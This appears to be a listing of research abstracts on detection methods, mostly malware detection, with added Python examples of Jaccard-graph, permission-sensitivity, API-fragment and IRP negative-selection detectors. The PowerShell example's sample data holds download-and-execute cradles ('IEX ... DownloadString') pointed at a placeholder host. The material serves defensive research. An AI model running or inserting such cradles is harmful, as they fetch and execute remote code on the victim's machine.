Malicious PowerShell Detection Using Graph Convolution Network

2021 ◽  
Vol 11 (14) ◽  
pp. 6429
Author(s):  
Sunoh Choi

The internet’s rapid growth has resulted in an increase in the number of malicious files. Recently, PowerShell scripts and Windows portable executable (PE) files have been used in malicious behaviors. To solve these problems, artificial intelligence (AI) based malware detection methods have been widely studied. Among AI techniques, the graph convolution network (GCN) was recently introduced. Here, we propose a malicious PowerShell detection method using a GCN. To use the GCN, we need an adjacency matrix; therefore, we propose an adjacency matrix generation method using the Jaccard similarity. In addition, we show that the malicious PowerShell detection rate is increased by approximately 8.2% using the GCN.
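As an added illustration of the adjacency-matrix step (this is not the paper's code), the following Python builds a script-to-script adjacency matrix from the Jaccard similarity of each script's token set and then applies the symmetric normalisation D^-1/2 (A+I) D^-1/2 that a Kipf-and-Welling GCN layer expects. The tokeniser, the similarity threshold of 0.5 and the three sample scripts are assumptions made for this example.

```python
"""Jaccard-similarity adjacency matrix for PowerShell scripts, GCN style.

Added example, not the paper's implementation. The tokeniser, the threshold and
the sample scripts below are assumptions made for illustration.
"""
import re
from itertools import combinations

# Constructed sample scripts: two near-identical download cradles and one benign admin one-liner.
SCRIPTS = {
    "s1": "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')",
    "s2": "IEX (New-Object Net.WebClient).DownloadString('http://example.test/b')",
    "s3": "Get-Process | Where-Object { $_.CPU -gt 100 } | Select-Object Name",
}

# Identifiers (cmdlets, .NET types, bare words) and variables; punctuation is dropped.
TOKEN_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.\-]*|\$\w+")


def tokens(script):
    """Case-folded token set; PowerShell is case-insensitive, so 'iex' and 'IEX' must collide."""
    return {t.lower() for t in TOKEN_RE.findall(script)}


def jaccard(a, b):
    """|A ∩ B| / |A ∪ B|; two empty sets are treated as identical."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def adjacency(scripts, threshold=0.5):
    """Return (ids, A): A[i][j] = 1.0 when Jaccard(i, j) >= threshold.

    Self-loops are included (A + I) so every node keeps its own features in the GCN.
    """
    ids = sorted(scripts)
    toks = {i: tokens(scripts[i]) for i in ids}
    n = len(ids)
    A = [[0.0] * n for _ in range(n)]
    for i in range(n):
        A[i][i] = 1.0
    for (i, a), (j, b) in combinations(enumerate(ids), 2):
        if jaccard(toks[a], toks[b]) >= threshold:
            A[i][j] = A[j][i] = 1.0
    return ids, A


def normalised(A):
    """Symmetric normalisation D^-1/2 A D^-1/2 (degrees already include the self-loop)."""
    deg = [sum(row) for row in A]
    n = len(A)
    return [[A[i][j] / (deg[i] * deg[j]) ** 0.5 for j in range(n)] for i in range(n)]


if __name__ == "__main__":
    ids, A = adjacency(SCRIPTS)
    for i, row in zip(ids, normalised(A)):
        print(i, [round(x, 3) for x in row])
```

With these inputs the two download cradles share 6 of 8 tokens (Jaccard 0.75) and are joined by an edge, while the Get-Process script shares nothing and stays an isolated node; the threshold is the knob that decides how dense the graph the GCN propagates over becomes.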

2021 ◽  
Vol 233 ◽  
pp. 02012
Author(s):  
Shousheng Liu ◽  
Zhigang Gai ◽  
Xu Chai ◽  
Fengxiang Guo ◽  
Mei Zhang ◽  
...  

Detecting and counting bacterial colonies is tedious and time-consuming work. Fortunately, CNN (convolutional neural network) detection methods are effective for target detection. Bacterial colonies are a kind of small target, which has been a difficult problem in the field of target detection technology. This paper proposes a small-target enhancement detection method based on double CNNs, which not only improves the detection accuracy but also maintains a detection speed similar to that of a general detection model. The detection method uses two CNNs. The first CNN uses the SSD_MOBILENET_V1 network, with both target positioning and target recognition functions. Candidate targets are screened out with a low confidence threshold, which ensures that no small targets are missed. The second CNN obtains candidate target regions according to the first round of detection, intercepts image sub-blocks one by one, and uses the MOBILENET_V1 network to filter targets with a higher confidence threshold, which ensures good detection of small targets. After the two-round enhancement detection method is ported to the embedded platform NVIDIA Jetson AGX Xavier, the detection accuracy of small targets is significantly improved, and the target false detection rate and missed detection rate are reduced to less than 1%.


2021 ◽  
Vol 2021 ◽  
pp. 1-12
Author(s):  
Yubo Song ◽  
Yijin Geng ◽  
Junbo Wang ◽  
Shang Gao ◽  
Wei Shi

Since a growing number of malicious applications attempt to steal users’ private data by illegally invoking permissions, application stores have deployed many malware detection methods based on application permissions. However, most of them ignore the specific permission combinations and application categories that affect detection accuracy, and the features they extract are not representative enough to distinguish benign from malicious applications. To address these problems, an Android malware detection method based on permission sensitivity is proposed. First, for each application category, the permission features and permission combination features are extracted. The sensitive permission feature set corresponding to each category label is then obtained by a feature selection method based on permission sensitivity. In the following step, the permissions invoked by the application to be detected are compared with the sensitive permission feature set, and a weight allocation method is used to quantify this information into numerical features. In the proposed method of malicious application detection, three machine-learning algorithms are selected to construct the classifier model and optimize the parameters. Compared with traditional methods, the proposed method consumes 60.94% less time while still achieving high accuracy of up to 92.17%.
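To make the category-specific sensitivity idea concrete, here is an added Python example (not the authors' implementation). It extracts single-permission and permission-pair features per app category, scores each feature's sensitivity as its rate among malicious apps minus its rate among benign apps of the same category, keeps the features above a threshold, and turns a new app's permission set into one weighted numeric feature. The sensitivity measure, the 0.5 threshold, the weight allocation and the labelled apps are all assumptions.

```python
"""Permission-sensitivity features for Android apps, computed per app category.

Added example, not the paper's implementation. The sensitivity measure
(malicious rate minus benign rate), the selection threshold and the weight
allocation are assumptions; the training apps below are constructed.
"""
from collections import defaultdict
from itertools import combinations

# Constructed labelled training data: (category, permissions requested, is_malicious)
TRAIN = [
    ("game", {"INTERNET", "READ_SMS", "SEND_SMS"}, True),
    ("game", {"INTERNET", "SEND_SMS", "READ_CONTACTS"}, True),
    ("game", {"INTERNET", "VIBRATE"}, False),
    ("game", {"INTERNET", "ACCESS_NETWORK_STATE"}, False),
    ("messaging", {"INTERNET", "READ_SMS", "SEND_SMS", "READ_CONTACTS"}, False),
    ("messaging", {"INTERNET", "READ_SMS", "SEND_SMS"}, False),
    ("messaging", {"INTERNET", "READ_SMS", "RECEIVE_BOOT_COMPLETED", "SYSTEM_ALERT_WINDOW"}, True),
]


def features(perms):
    """Single permissions plus unordered pairs (the permission-combination features)."""
    singles = {(p,) for p in perms}
    pairs = set(combinations(sorted(perms), 2))
    return singles | pairs


def sensitivity_table(train, category):
    """Per-feature sensitivity inside one category: rate among malware minus rate among benign."""
    mal = [perms for cat, perms, is_mal in train if cat == category and is_mal]
    ben = [perms for cat, perms, is_mal in train if cat == category and not is_mal]
    counts_m, counts_b = defaultdict(int), defaultdict(int)
    for app in mal:
        for f in features(app):
            counts_m[f] += 1
    for app in ben:
        for f in features(app):
            counts_b[f] += 1
    return {f: counts_m[f] / len(mal) - counts_b[f] / len(ben)
            for f in set(counts_m) | set(counts_b)}


def select_sensitive(table, threshold=0.5):
    """Feature selection: keep only features whose sensitivity reaches the threshold."""
    return {f: w for f, w in table.items() if w >= threshold}


def score(app_perms, sensitive):
    """Weight allocation: the sensitivity-weighted fraction of the category's sensitive
    features that the app actually invokes, as a single numeric feature in [0, 1]."""
    total = sum(sensitive.values())
    if total == 0:
        return 0.0
    app_feats = features(app_perms)
    hit = sum(w for f, w in sensitive.items() if f in app_feats)
    return hit / total


if __name__ == "__main__":
    for category in ("game", "messaging"):
        sens = select_sensitive(sensitivity_table(TRAIN, category))
        print(category, sorted(sens.items(), key=lambda kv: -kv[1])[:4])
    print("game app score:", score({"INTERNET", "SEND_SMS", "VIBRATE"}, select_sensitive(sensitivity_table(TRAIN, "game"))))
```

The same permission gets a different weight depending on the category: with this data SEND_SMS is maximally sensitive for games (every malicious game asks for it, no benign one does) but has negative sensitivity for messaging apps, where benign apps legitimately request it. That is exactly the signal a category-agnostic permission classifier throws away.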


2019 ◽  
Vol 2019 ◽  
pp. 1-9 ◽  
Author(s):  
Xin Ma ◽  
Shize Guo ◽  
Wei Bai ◽  
Jun Chen ◽  
Shiming Xia ◽  
...  

The explosive growth of malware variants poses a continuously and deeply evolving challenge to information security. Traditional malware detection methods require a lot of manpower. Machine learning has played an important role in malware classification and detection, but it is easily spoofed by malware that disguises itself as benign software by employing self-protection techniques, which leads to poor performance for existing techniques based on machine learning. In this paper, we analyze the local maliciousness of malware and implement an anti-interference detection framework based on API fragments, which uses an LSTM model to classify API fragments and employs ensemble learning to determine the final result for the entire API sequence. We present our experimental results on the Ali-Tianchi contest API databases. By comparing with experiments using some common methods, it is shown that our method based on local maliciousness has better performance, with a higher accuracy rate of 0.9734.


2013 ◽  
Vol 850-851 ◽  
pp. 767-770 ◽  
Author(s):  
Na Yao ◽  
Tie Cheng Bai ◽  
Jie Chen

According to the characteristics of Chinese character images, we propose an improved corner detection method based on the FAST algorithm and the Harris algorithm to improve the detection rate and shorten the running time for subsequent feature extraction. First, the image of Chinese characters is detected for corners using the FAST algorithm. Second, the corner response function (CRF) of the Harris algorithm is computed and false corners are removed. The corners found last are the endpoints of line segments, providing the length of line segments for shape feature extraction. The proposed method is compared with several corner detection methods over a number of images. Experimental results show that the proposed method performs better in terms of detection rate and running time.


2014 ◽  
Vol 519-520 ◽  
pp. 309-312 ◽  
Author(s):  
Jin Rong Bai ◽  
Zhen Zhou An ◽  
Guo Zhong Zou ◽  
Shi Guang Mu

Dynamic detection based on software behavior is an efficient and effective approach for anti-virus technology. Malware and benign executables differ mainly in the implementation of certain special behaviors for propagation and destruction. A program's execution flow is essentially equivalent to its stream of API calls. Analyzing the frequency of API calls from six kinds of behaviors at the same time differentiates very well between malicious and benign executables. This paper proposes a dynamic malware detection approach that mines the frequency of sensitive native API calls, and describes experiments conducted against recent Win32 malware. Experimental results indicate that the detection rate of the proposed method is 98% and the AUC value is 0.981. Furthermore, the proposed method can identify both known and unknown malware.
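The two API-based abstracts above (API fragments classified individually with an ensemble decision over the whole sequence, and the frequency of sensitive native API calls across six behavior categories) can be illustrated with one added Python example that is not code from either paper. It derives per-category call frequencies from a trace, then splits the trace into fixed-size fragments, scores each fragment with a simple rule that stands in for the LSTM classifier, and combines the fragment votes into a sample-level verdict. The six categories, the API names assigned to them, the scoring rule, the fragment size and the trace itself are all assumptions.

```python
"""Behaviour-category API frequencies and fragment-level ensemble voting.

Added example, not code from either paper. The six behaviour categories, the
sensitive-API lists, the per-fragment scoring rule (a stand-in for the LSTM
classifier) and the trace are assumptions constructed for illustration.
"""
from collections import Counter

# Assumed mapping of sensitive native API names to six behaviour categories.
CATEGORIES = {
    "file":     {"NtCreateFile", "NtWriteFile", "NtDeleteFile"},
    "registry": {"NtSetValueKey", "NtCreateKey"},
    "process":  {"NtCreateProcess", "NtOpenProcess", "NtWriteVirtualMemory"},
    "network":  {"WSASend", "WSAConnect"},
    "service":  {"CreateServiceW", "StartServiceW"},
    "memory":   {"NtAllocateVirtualMemory", "NtProtectVirtualMemory"},
}
SENSITIVE = {api: cat for cat, apis in CATEGORIES.items() for api in apis}

# Constructed trace: a short injector-like burst followed by a long tail of ordinary file I/O,
# the kind of "benign padding" that dilutes whole-sequence statistics.
TRACE = (["NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtProtectVirtualMemory",
          "NtCreateProcess", "WSAConnect", "WSASend"]
         + ["NtCreateFile", "NtReadFile", "NtClose"] * 6)


def category_frequencies(trace):
    """Fraction of all calls in the trace that fall into each behaviour category."""
    counts = Counter(SENSITIVE.get(api) for api in trace)  # None = not a sensitive API
    n = len(trace)
    return {cat: counts[cat] / n for cat in CATEGORIES}


def fragments(trace, size):
    """Split the API sequence into consecutive fragments of at most `size` calls."""
    return [trace[i:i + size] for i in range(0, len(trace), size)]


def fragment_is_malicious(frag, min_categories=3):
    """Stand-in for the per-fragment LSTM: flag a fragment that touches at least
    `min_categories` distinct sensitive behaviour categories (local maliciousness)."""
    touched = {SENSITIVE[api] for api in frag if api in SENSITIVE}
    return len(touched) >= min_categories


def classify_trace(trace, size=6, min_categories=3, min_flagged=1):
    """Ensemble decision over fragment votes. The default (any flagged fragment
    convicts the sample) keeps a malicious burst from being outvoted by a benign tail;
    raise `min_flagged` to trade that sensitivity for fewer false positives."""
    votes = [fragment_is_malicious(f, min_categories) for f in fragments(trace, size)]
    return sum(votes) >= min_flagged, votes


if __name__ == "__main__":
    print({k: round(v, 3) for k, v in category_frequencies(TRACE).items()})
    print(classify_trace(TRACE))
```

On this trace the whole-sequence frequency vector is dominated by the file category (25% of calls) while process, memory and network sit at about 8% each, yet the first fragment alone touches three categories and is flagged; the ensemble rule decides whether that single local verdict is enough.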


2014 ◽  
Vol 687-691 ◽  
pp. 2626-2629
Author(s):  
Fu Yong Zhang

The IRP (I/O Request Packet) sequences of programs are not identical across different environments on the same operating system, which has a certain influence on the detection results. Through many experiments, we found that the IRP request sequences of programs on the same operation path are consistent. Therefore, a new malware detection method based on path IRP sequences is proposed. Every single IRP request sequence on the same operation path is extracted, and the Negative Selection Algorithm (NSA) and Positive Selection Algorithm (PSA) are used for detection. Experimental results reveal that our method outperforms the method based on IRP sequences in detection rate.
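As an added example of how negative and positive selection can be run over the IRP sequences of one operation path (this is not the paper's code), the following Python treats each sequence as a string of IRP major-function codes, takes the benign sequences captured on that path as the "self" set, builds r-gram detectors, and classifies a new sequence. Negative selection keeps every candidate r-gram that matches no self sequence; positive selection keeps exactly the r-grams that self does contain. The alphabet of major-function codes, the detector length r = 3, the exhaustive detector generation (real NSA implementations sample candidates randomly), the coverage threshold and the traces are assumptions.

```python
"""Negative and positive selection over IRP sequences captured on one operation path.

Added example, not the paper's implementation. The IRP major-function alphabet,
the r-gram detector shape, the thresholds and the traces are assumptions.
"""
from itertools import product

# Assumed alphabet of IRP major-function codes observed on a file-access path.
ALPHABET = ("CREATE", "READ", "WRITE", "QUERY_INFORMATION", "SET_INFORMATION",
            "DIRECTORY_CONTROL", "CLEANUP", "CLOSE")
R = 3  # detector length in IRPs (r-grams)

# Constructed self set: benign IRP sequences recorded on the same operation path.
SELF = [
    ["CREATE", "QUERY_INFORMATION", "READ", "READ", "CLEANUP", "CLOSE"],
    ["CREATE", "QUERY_INFORMATION", "READ", "CLEANUP", "CLOSE"],
    ["CREATE", "READ", "READ", "READ", "CLEANUP", "CLOSE"],
]


def rgrams(seq, r=R):
    """All consecutive r-grams of an IRP sequence."""
    return {tuple(seq[i:i + r]) for i in range(len(seq) - r + 1)}


def positive_detectors(self_seqs, r=R):
    """PSA: the detectors are exactly the r-grams that occur in self."""
    detectors = set()
    for s in self_seqs:
        detectors |= rgrams(s, r)
    return detectors


def negative_detectors(self_seqs, alphabet=ALPHABET, r=R):
    """NSA: generate candidate r-grams over the alphabet and censor any that match self;
    the survivors are the detectors. Exhaustive here because the alphabet is tiny."""
    self_grams = positive_detectors(self_seqs, r)
    return {g for g in product(alphabet, repeat=r) if g not in self_grams}


def classify_irp(seq, pos, neg, r=R, min_self_coverage=0.8):
    """Return (is_nonself, negative_detectors_fired, self_coverage).

    A sequence is non-self (malicious) if any negative detector fires, or if the share of
    its r-grams covered by positive detectors drops below `min_self_coverage`.
    """
    grams = rgrams(seq, r)
    if not grams:  # shorter than r: nothing to match, treat as self with zero coverage
        return False, 0, 0.0
    fired = len(grams & neg)
    coverage = len(grams & pos) / len(grams)
    return (fired > 0 or coverage < min_self_coverage), fired, coverage


if __name__ == "__main__":
    pos, neg = positive_detectors(SELF), negative_detectors(SELF)
    print(len(pos), "positive detectors,", len(neg), "negative detectors")
    # Constructed: an encrypt-in-place pattern (read, write, set info) on the same path.
    print(classify_irp(["CREATE", "READ", "WRITE", "SET_INFORMATION", "CLEANUP", "CLOSE"], pos, neg))
    # Constructed: an unseen but benign-looking variant of the same path.
    print(classify_irp(["CREATE", "QUERY_INFORMATION", "READ", "READ", "READ", "CLEANUP", "CLOSE"], pos, neg))
```

Restricting the self set to one operation path is what keeps the detector sets small and stable: the unseen benign variant above is accepted because all of its r-grams were already seen on that path, while the read-write-set-information pattern fires four negative detectors and has zero self coverage.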


Sensors ◽  
2019 ◽  
Vol 19 (16) ◽  
pp. 3607 ◽  
Author(s):  
Miseon Han ◽  
Jeongtae Kim

We investigated a machine learning-based joint banknote recognition and counterfeit detection method. Unlike existing methods, since the proposed method simultaneously recognizes the banknote type and detects counterfeits, it is significantly faster than existing serial banknote recognition and counterfeit detection methods. Furthermore, we propose an explainable artificial intelligence method for visualizing the regions that contributed to the recognition and detection. Using the visualization, it is possible to understand the behavior of the trained machine learning system. In experiments using United States Dollar and European Union Euro banknotes, the proposed method shows a significant improvement in computation time over the conventional serial method.


2021 ◽  
Vol 2079 (1) ◽  
pp. 012030
Author(s):  
Haihong Liang ◽  
Ling Zeng ◽  
Xiaozhou Shen ◽  
Weiwei Shi ◽  
Jiujiao Cang

The existing quality detection methods for business expansion digital archives have the problem of fuzzy evaluation standards, which leads to low classification accuracy. This paper designs a quality detection method for business expansion digital archives based on artificial intelligence technology. The business characteristics of business development are extracted, the minimum business data unit is described, the digital archive catalogue database is established, the digital archive evaluation standard is defined, the text similarity is calculated, the user model is established, and the quality inspection mode is established using artificial intelligence technology. Experimental results: the average classification accuracy of the designed method based on artificial intelligence technology and the other two quality detection methods is 55.763, 43.560 and 42.605 respectively, which proves that the quality detection method based on artificial intelligence technology has higher practical value.


2021 ◽  
Author(s):  
Weiwei Wang ◽  
Xinjie Zhao ◽  
Yanshu Jia

To improve the diagnostic efficiency and accuracy of coronavirus disease 2019 (COVID-19), and to study the application of artificial intelligence (AI) in COVID-19 diagnosis and public health management, the computed tomography (CT) image data of 200 COVID-19 patients were collected, and the images were input into the AI-assisted diagnosis software based on a deep learning model, "uAI the COVID-19 intelligent auxiliary analysis system", for lesion detection. The software automatically identifies and marks pneumonia lesions in batches, and automatically calculates the lesion volume. The results show that the CT manifestations of the patients mainly involve multiple lobes, and in density the most common shadow is ground-glass opacity. The detection rate of the manual detection method is 95.30%, the misdiagnosis rate is 0.20% and the missed diagnosis rate is 4.50%; the detection rate of the AI software lesion detection method based on the deep learning model is 99.76%, the misdiagnosis rate is 0.08%, and the missed diagnosis rate is 0.08%. Therefore, it can effectively identify COVID-19 lesions and provide relevant lesion data to give objective data support for COVID-19 diagnosis and public health management.


2018 ◽  
Vol 2018 ◽  
pp. 1-18 ◽  
Author(s):  
Jinpei Yan ◽  
Yong Qi ◽  
Qifan Rao

Mobile security is an important issue on the Android platform. Most malware detection methods based on machine learning models rely heavily on expert knowledge for manual feature engineering, which still struggles to fully describe malware. In this paper, we present the LSTM-based hierarchical denoise network (HDN), a novel static Android malware detection method that uses LSTM to learn directly from the raw opcode sequences extracted from decompiled Android files. However, most opcode sequences are too long for an LSTM to train on due to the vanishing gradient problem. Hence, HDN uses a hierarchical structure, whose first-level LSTM computes in parallel on opcode subsequences (which we call method blocks) to learn dense representations; the second-level LSTM can then learn and detect malware from method block sequences. Considering that malicious behavior appears only in some sequence segments, HDN uses a method block denoise module (MBDM) for data denoising with an adaptive gradient scaling strategy based on a loss cache. We evaluate and compare HDN with the latest mainstream research on three datasets. The results show that HDN outperforms these Android malware detection methods, and that it is able to capture longer sequence features and has better detection efficiency than N-gram-based malware detection, which is similar to our method.

